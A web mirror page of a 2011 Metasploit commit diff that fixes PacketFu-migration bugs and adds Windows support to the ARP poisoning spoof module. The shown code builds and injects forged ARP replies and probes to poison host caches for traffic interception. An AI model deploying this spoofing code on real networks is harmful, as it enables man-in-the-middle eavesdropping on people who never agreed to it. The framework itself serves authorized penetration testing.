infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

correct some bug left after packetfu migration and make this module compatible with windows 

git-svn-id: file:///home/svn/framework3/trunk@13626 4d416f70-5f16-0410-b530-b9f4589650da
unstable
amaloteaux 2011-08-24 20:44:39 +00:00
parent a1bace0cb9
commit 5e1dd48c72
1 changed files with 13 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
modules/auxiliary/spoof/arp/arp_poisoning.rb
View File

@ -79,7 +79,8 @@ class Metasploit3 < Msf::Auxiliary
begin
@interface = datastore['INTERFACE'] || Pcap.lookupdev
#This is needed on windows cause we send interface directly to Pcap functions
@interface = get_interface_guid(@interface)
@smac = datastore['SMAC']
@smac ||= get_mac(@interface) if @netifaces
raise RuntimeError ,'Source Mac should be defined' unless @smac
@ -124,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary
if shost != dhost
print_status("Sending arp packet for #{shost} to #{dhost}") if datastore['VERBOSE']
reply = buildreply(shost, smac, dhost, dmac)
capture.inject(reply)
inject(reply)
Kernel.select(nil, nil, nil, (datastore['PKT_DELAY'] * 1.0 )/1000)
end
end
@ -133,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary
if shost != dhost
print_status("Sending arp request for #{shost} to #{dhost}") if datastore['VERBOSE']
request = buildprobe(dhost, dmac, shost)
capture.inject(request)
inject(request)
Kernel.select(nil, nil, nil, (datastore['PKT_DELAY'] * 1.0 )/1000)
end
end
@ -147,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary
if shost != dhost
print_status("Sending arp packet for #{dhost} to #{shost}") if datastore['VERBOSE']
reply = buildreply(dhost, dmac, shost, smac)
capture.inject(reply)
inject(reply)
Kernel.select(nil, nil, nil, (datastore['PKT_DELAY'] * 1.0 )/1000)
end
end
@ -165,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
@shosts.each do |shost|
print_status("Sending arp packet for #{shost} address") if datastore['VERBOSE']
reply = buildreply(shost, @smac, '0.0.0.0', 'ff:ff:ff:ff:ff:ff')
capture.inject(reply)
inject(reply)
Kernel.select(nil, nil, nil, (datastore['PKT_DELAY'] * 1.0 )/1000)
end
end
@ -186,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Sending arp packet to #{dhost}")
end
probe = buildprobe(@sip, lsmac, dhost)
capture.inject(probe)
inject(probe)
while(reply = getreply())
next if not reply.is_arp?
#Without this check any arp request would be added to the cache
@ -228,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Sending arp packet to #{shost}")
end
probe = buildprobe(@sip, lsmac, shost)
capture.inject(probe)
inject(probe)
while(reply = getreply())
next if not reply.is_arp?
if @shosts.include? reply.arp_saddr_ip
@ -289,7 +290,7 @@ class Metasploit3 < Msf::Auxiliary
if shost != dhost
print_status("Sending arp packet for #{shost} to #{dhost}") if datastore['VERBOSE']
reply = buildreply(shost, @smac, dhost, dmac)
capture.inject(reply)
inject(reply)
Kernel.select(nil, nil, nil, (datastore['PKT_DELAY'] * 1.0 )/1000)
end
end
@ -298,7 +299,7 @@ class Metasploit3 < Msf::Auxiliary
if shost != dhost
print_status("Sending arp packet for #{shost} to #{dhost}") if datastore['VERBOSE']
reply = buildreply(shost, @smac, dhost, dmac)
capture.inject(reply)
inject(reply)
Kernel.select(nil, nil, nil, (datastore['PKT_DELAY'] * 1.0 )/1000)
end
end
@ -313,7 +314,7 @@ class Metasploit3 < Msf::Auxiliary
if shost != dhost
print_status("Sending arp packet for #{dhost} to #{shost}") if datastore['VERBOSE']
reply = buildreply(dhost, @smac, shost, smac)
capture.inject(reply)
inject(reply)
Kernel.select(nil, nil, nil, (datastore['PKT_DELAY'] * 1.0 )/1000)
end
end
@ -347,8 +348,8 @@ class Metasploit3 < Msf::Auxiliary
def buildreply(shost, smac, dhost, dmac)
p = PacketFu::ARPPacket.new
n.eth_saddr = smac
n.eth_daddr = dmac
p.eth_saddr = smac
p.eth_daddr = dmac
p.arp_opcode = 2 # ARP Reply
p.arp_daddr_mac = p.eth_daddr
p.arp_saddr_mac = p.eth_saddr